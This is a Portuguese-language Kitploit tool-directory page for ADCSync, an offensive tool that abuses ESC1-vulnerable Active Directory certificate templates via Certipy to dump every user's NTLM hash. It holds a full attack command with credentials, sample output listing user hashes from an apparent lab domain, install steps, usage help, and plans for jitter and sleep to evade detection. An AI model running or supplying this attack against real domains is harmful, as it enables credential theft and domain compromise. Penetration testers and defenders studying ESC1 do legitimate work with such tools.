Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ADCSync — Use o ESC1 para realizar um DCSync improvisado e despejar hashes. | Kitploit
Ferramentas/GitHubGitHub/jpg0mez/adcsync
Quebra de SenhasExploraçãoTestes de PenetraçãoAutenticação
GitHubjpg0mez/adcsync

ADCSync

Use o ESC1 para realizar um DCSync improvisado e despejar hashes.

Ver Repositório
212243há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ADCSsync

Esta é uma ferramenta que montei rapidamente para fazer DCSync utilizando ESC1. É bastante lenta, mas ainda assim um meio eficaz de realizar um ataque DCSync improvisado sem utilizar DRSUAPI ou Volume Shadow Copy.

Esta é a primeira versão da ferramenta e essencialmente automatiza o processo de executar Certipy contra cada usuário em um domínio. Ainda precisa de muito trabalho e pretendo adicionar mais recursos no futuro para métodos de autenticação e automatizar o processo de encontrar um template vulnerável.

root@kitploit:~
python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

    ___    ____  ___________
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/  |_/_____/\____//____/\__, /_/ /_/\___/
                         /____/

Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00,  1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

Introdução

O ADCSync utiliza o exploit ESC1 para extrair hashes NTLM de contas de usuário em um ambiente Active Directory. A ferramenta primeiro captura todos os usuários e domínios no arquivo de dump do Bloodhound fornecido. Em seguida, usa Certipy para fazer uma requisição para cada usuário e armazenar seu arquivo PFX no diretório de certificados. Por fim, usa Certipy para autenticar com o certificado e recuperar o hash NT de cada usuário. Esse processo é bastante lento e pode levar um tempo para ser concluído, mas oferece uma forma alternativa de extrair hashes NTLM.

Instalação

root@kitploit:~
git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt

Uso

Para usar esta ferramenta, precisamos das seguintes coisas:

  1. Credenciais de Domínio Válidas
  2. Uma lista de usuários de um dump do Bloodhound que será fornecida.
  3. Um template vulnerável ao ESC1 (encontrado com Certipy find)
root@kitploit:~
# python3 adcsync.py --help
    ___    ____  ___________                 
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__  
/_/  |_/_____/\____//____/\__, /_/ /_/\___/  
                         /____/              

Usage: adcsync.py [OPTIONS]

Options:
  -f, --file TEXT      Input User List JSON file from Bloodhound  [required]
  -o, --output TEXT    NTLM Hash Output file  [required]
  -ca TEXT             Certificate Authority  [required]
  -dc-ip TEXT          IP Address of Domain Controller  [required]
  -u, --user TEXT      Username  [required]
  -p, --password TEXT  Password  [required]
  -template TEXT       Template Name vulnerable to ESC1  [required]
  -target-ip TEXT      IP Address of the target machine  [required]
  --help               Show this message and exit.

A FAZER

  • Suporte a métodos de autenticação alternativos, como hashes NTLM e arquivos ccache
  • Executar automaticamente "certipy find" para encontrar e capturar templates vulneráveis ao ESC1
  • Adicionar opções de jitter e sleep para evitar detecção
  • Adicionar validação de tipo para todas as variáveis

Agradecimentos

  • puzzlepeaches: Por me apressar a escrever isso
  • ly4k: Pelo Certipy
  • WazeHell: Pelo script para configurar o ambiente AD vulnerável usado para testes
Baixar ferramenta